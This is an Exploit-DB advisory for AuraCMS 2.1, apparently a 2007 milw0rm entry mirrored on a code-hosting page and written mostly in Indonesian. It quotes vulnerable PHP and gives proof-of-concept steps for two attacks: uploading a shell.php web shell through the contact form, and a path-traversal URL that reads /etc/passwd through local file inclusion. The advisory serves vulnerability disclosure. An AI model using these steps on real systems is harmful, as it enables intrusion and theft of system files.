bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/4390.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

179 lines
4.7 KiB
Text
Executable file
Raw Blame History

########################################################################
# AuraCMS 2.1 - Remote File Attachment - Local File Inclusion
# Vendor : http://www.auracms.org/
# Download : http://www.auracms.org/dl_jump.php?id=42
# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net
########################################################################
====================================
Remote File Attachment Vulnerability
====================================
//berkas pada '/mod/contak.php'
---------------- Baris-41 --------------------
if ($_POST['submit']) {
$nama = text_filter($_POST['nama']);
$email = text_filter($_POST['email']);
$pesan = nl2br(text_filter($_POST['pesan'], 2));
$images = text_filter($_POST['image']);
checkemail($email);
$gfx_check = intval($_POST['gfx_check']);
if (!$nama) $error .= "Error: Please enter your name!<br />";
if (!$pesan) $error .= "Error: Please enter a message!<br />";
$code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);
if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";
if ($error) {
$tengah.='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';
} else {
if (!empty ($image_name)){
$image_name = $_FILES['image']['name'];
$image_temp = $_FILES['image']['tmp_name'];
$tempat = "files/";
@copy($_FILES[image][tmp_name], "./files/".$image_name);
if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){
unlink($image);
$sukses = "Sukses Upload File ".$image_name;
}else{
$sukses = "Gagal Upload File ".$image_name;
---------------- Baris-61 --------------------
pemfilteran "$images" tidak sempurna, sehingga pengguna dapat mengupload/attachment file yang tidak diinginkan kedalam direktori /files/.
//POC;
http://localhost/auracms2.1/index.php?pilih=../mod/contak
atau
http://localhost/auracms2.1/index.php?pilih=contak&mod=yes
isi semua konten isian, masukan angka 'security code' dengan benar, "Attachment" --> shell.php ;
http://localhost/auracms2.1/files/shell.php
===================================
Local File Inclusion Vulnerability
===================================
//berkas pada '/index.php' - AuraCMS versi 2.x
--------- baris-24 ----------
if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = '';
if(!isset($_GET['pilih'])){
include 'content/normal.php';
}else {
if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){
include "mod/$_GET[pilih].php";
} else {
if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){
$_GET['pilih'] = 'normal';
--------- baris-39 ----------
//berkas pada '/index.php' - AuraCMS versi 1.x
--------- baris-13 ----------
<?
if(!isset($pilih))$pilih='';
switch($pilih){
case '':
include "normal.php";
break;
default:
if($mod == "yes" && file_exists("mod/$pilih.php")){
include "mod/$pilih.php";
} else {
if (eregi('http://', $pilih) or !file_exists("$pilih.php")){
$pilih = 'normal';
}
include "$pilih.php";
}
break;
}
?>
--------- baris-33 ----------
need magic_quotes_gpc = off ,
jika magic_quotes_gpc = off maka pengguna dapat memanipulasi $pilih
//POC;
http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00
########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1n9k0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking
-----------------------
-newhack[dot]org|staff-
mR.opt1lc ,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack[dot]org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&security Indonesia
Cintailah Bahasa Indonesia
# milw0rm.com [2007-09-10]
Reference in a new issue View git blame Copy permalink